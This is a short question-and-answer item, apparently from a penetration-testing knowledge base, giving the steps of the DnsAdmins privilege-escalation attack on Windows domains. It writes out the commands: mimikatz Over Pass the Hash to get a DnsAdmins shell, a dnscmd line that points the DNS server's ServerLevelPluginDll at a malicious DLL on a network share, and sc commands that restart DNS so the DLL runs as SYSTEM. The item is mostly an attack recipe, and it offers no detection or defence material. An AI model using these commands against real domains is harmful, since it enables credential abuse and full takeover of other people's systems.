How do you execute the exploit using dnscmd and mimikatz?
First, use mimikatz with Over Pass the Hash (`sekurlsa::pth`) to obtain a cmd process with the privileges of a DnsAdmins user. Then run: `dnscmd <DNS_Server_IP> /config /serverlevelplugindll \\share\path\malicious.dll`. This sets a registry key at `HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll`. Restart the DNS service (e.g., `sc \\server stop dns` and `sc \\server start dns`) to load the DLL with SYSTEM privileges. For obtaining DNS records beforehand, see Domain Penetration - Obtaining DNS Records.
dnscmd, mimikatz, Over Pass the Hash, ServerLevelPluginDll, DLL loading, DNS service restart